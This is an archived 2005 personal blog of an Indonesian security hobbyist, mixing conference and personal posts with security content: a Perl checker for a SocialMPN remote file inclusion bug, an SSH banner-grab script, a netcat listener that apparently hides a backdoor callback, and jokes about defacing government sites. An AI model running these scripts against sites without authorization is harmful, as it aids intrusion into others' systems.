Monday, March 28, 2005

*OLEH OLEH BCS (resume)

0 comments
Ini cerita yang mau gw bagi bagi, mudah mudahan dapat bermanfaat bagi kita semua.

Friday, March 25, 2005

*OLEH OLEH BCS (picture)

0 comments


/me at BCS 2005 on CTF (Capture the Flag) contest day One (Januari ,23th 2005)
U can see another pictures by Clicking ThIs.

*OLEH OLEH BCS

0 comments
*mirrored from : http://echo.or.id/forum/viewtopic.php?p=8471#8471

just FYI

oleh oleh ikut konferensi BCS* tentang kasus deface deface-an malaysia dan indonesia :

1. jim [jim geovedi , organizer, belua ] says : " ngapain deface web malaysia, rugi !! tuh yang untung malah temen temen gwa (HITB*, red) mereka dapet job full . sedang kalo indonesia di deface adminnya di sumpah serapah !"

2. l33tdawg (HITB* [founder]) says : "dont hack gov.my , *_^ ok! " (after we take a price of winning CTF (really ???? , i dunno! ) n they giving us HITB t-shirt (kewl))

3. Rosli (HITB* [crew]) says: " i dont care if u hack gov.sg !" ,wuekxxxx?????


jadi ?????

i dont care either, so ? im so happy can join the conference

*ps: full story about conferrence will be report soon, for sharing only

salam
---
y3dips

Tuesday, March 22, 2005

sweet devil

0 comments


ive made it in Colaboration with my best friends (yudz) he paint the basic then i give a final touch ( wings, and others )

Monday, March 21, 2005

Catch by K500i

0 comments
/me and the_day (Demo time At UMB Seminar 'hacking and Network security' )



*_^

Thursday, March 17, 2005

Strange ?

0 comments
I find a funny thing when i use Netcat , it open connection to 83.138.187.18
using port that i define in netcat options listening for example : 333
even i change the port number but it still happen ?

what does it means ?
im not testing it yet on windows or another PC

I use it on my box (fedora core 1) with Wine with Netcat 1.10 for NT - nc11nt.zip

[y3dips@y3dips netcat]$ wine nc.exe L 333
Could not stat /mnt/floppy (No such file or directory), ignoring drive A:

[y3dips@y3dips y3dips]$ netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 192.168.1.9:32780 216.155.193.183:5050 ESTABLISHED
tcp 0 1 192.168.1.9:34217 83.138.187.18:333 SYN_SENT

[y3dips@y3dips y3dips]$ ping ultimatesearch.com
PING ultimatesearch.com (83.138.187.18) 56(84) bytes of data.
64 bytes from 83.138.187.18: icmp_seq=0 ttl=52 time=1319 ms

even when i change to another port

[y3dips@y3dips netcat]$ wine nc.exe lvvp 8888
Could not stat /mnt/floppy (No such file or directory), ignoring drive A:

[y3dips@y3dips y3dips]$ netstat -tan
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 1 192.168.1.9:34278 83.138.187.18:8888 SYN_SENT

is it backdoor ?
the funny things is why it connect to http://ultimatesearch.com

any comment or suggestion ?
maybe i use a wrong netcat on my linux box with wine

btw, after that i download netcate from sf.net
n i cek the md5
after that i run it again n it workz

Wednesday, March 16, 2005

Fedora Core 4 Test 1 [Available]

0 comments
fedora core 4 sudah tersedia untuk di test , bagi yang berminat dapat mendonlodnya di sini, sayang gak punya b/w gede tuk donlodnya ,kalo mo dicobain donlod pake GPRS pasti ma`crut . Fitur baru di Fedora Core 4 test 1 ini adalah GCC 4.0, GNOME 2.10, dan menggunakan KDE 3.4

Monday, March 14, 2005

Patch Forum

0 comments
Im back from bandung city, FYI bandung dah gak dingin lagi seperti pertama aku kesana (th 1999) , dan ceweknya gak secakep dulu juga :( (kalo duluw yang di angkot dan di sedan sama cakep) heuheuheu (p.s : chayank jangan marah yach)

Balik balik dapet report dari Biatch-X kalo forum echo ada flaws (Walau gak bisa masuk "admin" (dalam tanda kutip)) tetapi POCnya sich berbahaya, pantas the_day nelpon sore sore pas aku lagi makan NASGOR di puncak (on the way back to jakarta) ,dan dia baru 'masking' duank dan belum sempat lakukan patching. Karena aku sempat nge-patchingnya so aku kerjain malem-malem(00.14), "the silly thing" : karena dah lama gak ber"cumbu" dengan PHPbb (biasanya the_day , coz dia yang aku serahin tanggung jawab) jadi agak aneh juga nih rasanya , pake ada error duluw lagi (culun!!) but now, The forum is UP again (with more secure configuration that u cant imagine :P )

Friday, March 11, 2005

In Bandung For The Weekend

0 comments
Im in bandung for three days ([11-13]th March 2005) to be present at my "friends" wedding. See ya all soon

Thursday, March 10, 2005

Ambalat ?

0 comments
Ada yang bisa cerita ambalat itu dimana ? ADa apaan disana ? tahu gak yach mereka yang pada "deface" itu ambalat dimana ? kan malu sama orang lain kalo ditanya ambalat itu letaknya dimana ? pokok permasalahannya dimana ?

Jangan sampe seperti cerita di kampung saya, main bakar, main hajar gak taunya itu cuma orang yang (mohon maaf) "kurang waras".

indonesiaku.. indonesiaku ..

btw , gimana pendapat penduduk ambalat yach ? mereka mau ikut indonesia pa malaysia ? .. gak ngerti dech... FUCK POLITIC !!!!

apaan sich gwa nih :(

[oot] Special Gift On My Birthday

0 comments
Yesterday was my birthday, it was my 23th years on earth , many wishes that i mention to be granted, but "my girl" has wrote my wishes on her card with special gift that i love very much. I hope ^GOD^ would hear it and make it all happen. amin




thxs ^GOD^ for everything that u choose for me , n especially "my girl" for all the time & love

Wednesday, March 09, 2005

Ambalat statement ?

0 comments
Taken from my reply to Newbie_hacker@yahoogroups.com about Cyber War !!

--- In newbie_hacker@yahoogroups.com, r3dc377 - wrote:
>
> teman teman,
> Saya cuman mo tanya,
> bila perang mempertahankan NKRI
> kelak pecah, apakah cyberwar Indonesia-Malaysia juga
> harus pecah?
>
> Kalaupun iya, sebaiknya ECHO salahsatu komunitas yang
> cukup potensial mulai memobilisasi anggota dan
> peralatan perang(paling tidak scanning).
>
> Bila jawabnya tidak, sebaiknya ECHO juga memberikan
> pernyataan bahwa ECHO tidak bertanggungjawab atas
> aktifitas apapun yang dilakukan anggotannya bila
> terlibat dalam perang.
>
> thanks
>
> Heaven And Hell Incident

Wew,.. jadi panjang urusannya :)

Single statement from me (pendapat pribadi) :

*Jika terjadi perang (sungguhan, dunia nyata) meskipun sangat saya sesalkan (bakal merugikan rakyat banyak, karena menguras biaya ( yang sebaiknya di alihkan ke subsidi BBM dan lain lain) dan juga menyengsarakan rakyat banyak, dsb efek negatif yang timbul) maka dengan sukarela saya ikut membantu jika tenaga saya dibutuhkan !!

*soal Cyber War , kalo hal ini semakin memperkeruh keadaan , maka saya (pribadi) merasa lebih baik tidak ikut ikutan, disamping ilmu yang 'tidak seberapa' dan pula lebih baik menjaga situs sendiri (red: echo) agar tidak ter-update (:p)


salam
----
y3dips

"think what you gonna do, coz you have to responsible for all youve did"

Monday, March 07, 2005

Remote Testing SocialMPN script

0 comments
#!/usr/bin/perl -w

# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug find by zer0-c00l ,
# Bug published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html

print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";

require LWP::UserAgent;

if(@ARGV == 2)
{

$target= $ARGV[0];
$xploit= $ARGV[1];


my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target/modules.php?name=$xploit&file=article&sid=2";
# just for trick , use "?" in the last char of your file inclusion path

my $injek = $ua->get($url);

print " -------------------------------\n";
if ($injek->is_success)
{
$injekcek = $injek->as_string;
if ($injekcek =~ /(HTTP\/1\.0 200 OK)/)
{ print("\n This Site Maybe Vulnerable \n"); }
else
{die $injek->status_line;}
print " -------------------------------\n";
}
}

else{
print "Use: perl $0 [target] [xplo.txt] \n";
}

#EOF y3dips(c)2005

Sunday, March 06, 2005

VULNERABILITIES IN WEB APPLICATIONS

0 comments
Taken from Linux.com ,written by Raymond Ankobia .

This is by no means an exhaustive list but an indication of some serious flaws exploited by hackers. Hacking Exposed: Web Applications (ISBN 007222438X) as a good source for the subject area.

1. Buffer Overflow Attack
2. SQL Injection Attack
3. Cross Site Scripting Attack
4. Input Validation Attack
5. Phishing Attack
6. Mobile code
7. Insecure Configuration Management
8. Google Hacking

:. you can find a full article and download pdf file here

Saturday, March 05, 2005

Pameran JCC with 'yayank'

0 comments
Hari ini sempet main main ke pameran yang di adakan di Jakarta Convention Center (JCC) sama "yayank" . Lumayan banyak yang bagus bagus (walau cuma ngiler duank, coz gak ada duit) terutama iPODnya MAC, terus Powerbook G5 , terus dah banyak stand majalah (kapan ezine bisa nongkrong disitu , for free )

iseng iseng ngambil screenshot di situ , ini foto "yayank" lagi duduk kecapean di ajak ngiter-ngiter di keramaian, mana lagi 'batuk' (thx yach yank dah mau nemenin )



dan juga keramaian yang sempat ter-capture



Meskipun Cape dan kehujanan dan alhasil naympe Rumah kemaleman banget , tapi Aseeeek dech

Thursday, March 03, 2005

Maenan Baru Gw nih

0 comments
Iseng iseng Browse di google buat nyari Theme gratisan buat hp gw yang baru (k-500i) , eh malah nemuin link bagus yang bikin gw bangga banget ma sonyericsson , di link ini semuanya di support dan yang paling TOP adalah , software untuk create theme , dan dengan software itu gw bisa create "echo" theme tuk sony ericsson k-500i gw. kamu bisa donlod di sini , coba deh liat screenshot berikut



aseeek, ada maenan baru ... bisa bikin theme yayang dech

kicked from #phrack by sd_

0 comments
Apez, gak ada angin gak ada ujan, gw di kick dan di banned dari #phrack, alasannya lucu [lihat di quotes] , btw emang sich saat itu yang ol di #phrack EFNET op semua, so gw duank yang pendatang . heueuhe .. lucunya lagi yang nge-kick masih mau chat ma gwa ..

---- i left my psy Online -------
#phrack i'm like the cookie monster on an acid trip
-
#phrack y3dip[S] @uglyduck @v0id @cefx_ @chroot @Crg @om @rap1st @nt @mcb @s4ur0n @yks_ @halfdead @_bobdash @gebbels @sd_ @dvorak- @cripy
#phrack End of /NAMES list.

------------------------ EOF-----

suddently ...

-------------- ive got kicked ---

* You were kicked from #phrack by sd_ (qiz winner for today)

------------EOF------------------

also banned :((

---------------banned------------
-
#phrack unable to join channel (address is banned)
-
#phrack unable to join channel (address is banned)
-
#phrack End of /NAMES list.

-----------------------EOF-------

@op who kicked me "HARD"

-----------------------sd_ ------
-
sd_ is sd@fucksheep.org * no job. no girl. no money. no problem. no future.
sd_ using irc.efnet.pl Bo Legia mistrzem jest!
sd_ End of /WHOIS list.

---------------------EOF---------
-
-> *sd_* excuse me , why you kick me from #phrack ?

-------- quotes ------

sd_: you won the qiz
y3dips: i dunno understand ?
y3dips: qiz ???
sd_: yah
sd_: contest
y3dips: what kind of contest ? i never remember that im join the contest
y3dips: what kind of contest ?
sd_: "get into #phrack"
sd_: sorry cant tell more
y3dips: do i do something wrong ?
sd_: on the contrary
sd_: you did well
sd_: thats why you won the prize
y3dips: im still dont understand , i just want to join #phrack community , i need to learn much
y3dips: but if this bother u, im sorry
y3dips: thats fine
y3dips: btw, thx for answering my question even you KICK me hard

------quotes------------------

btw, any suggestion or comment ?
they are so funny...

after that i can join the #phrack for a while

Wednesday, March 02, 2005

Dudul belajar Perl

0 comments
Section : Simple (Banget) Remote SSH Grab Banner

Catatan : baru bisa sempurna buat SSH , karena SSH langsung print banner infonya secar sempurna di line pertama :(

[---------------------------------//code------------------------
#!/usr/bin/perl -w
print "*Simple Remote SSH Grab Banner by y3dips*\n";
if(@ARGV==0)
#Help Options
{
print "Gunakan: perl $0 www.target.com:ssh \n";
}
else
#Processing
{
use IO::Socket;
my$server = shift;
my$love = IO::Socket::INET->new($server);
my$garis = <$love>;
print "Result = $garis";
}
--------------------------------------------\\EOF------------]

Tuesday, March 01, 2005

The Insecure Indexing Vulnerability Attacks

0 comments
Dari artikel baru yang di keluarkan WASC (Web Application security Consortium), di kemukakan salah satu jenis Vulnerability yaitu Indexing vulnerability pada Local Search Engine, dianalogikan beberapa perbedaan dan kelemahan dari metode pencarian yang mem-forward "searching"nya ke situs search engine (eg: google.com, yahoo.com , dsb) dengan pencarian secara lokal, pencarian secara lokal dapat memiliki kelemahan ini dikarenakan searching yang dilakukan dapat membypass .htaccess (selama permission file tidak di modifikasi) yang di terdapat di direktori web itu sendiri.di artikel ini juga di jelaskan beberapa teknik yang bisa dipakai.Lengkapnya baca di sini .

[OOT] PIC on Seminar

0 comments
Huem, ternyata kemarin pas Seminar kita gunain 3 Operating system yang berbeda :) . Dua kelas besar sich (*nix dan Windows) , dimana Nix ada 2 , 1 versi gratis Fedora Core (punya saya nih) yang paling kiri :) , 1 lagi Apple (punya z3r0byt3) dan 1 lagi punya the_Day dengan WinXP nya.

look the picture

Kill Full path disclosure

0 comments
Kamu bisa gunakan sintax ini di script kamu , agar error_reporting di matikan
------- //-----------------------
error_reporting(0);
ini_set('display_errors','0');
set_error_handler("foobarfunc");
----------------------\\---------
selain kamu matikan dari php.ini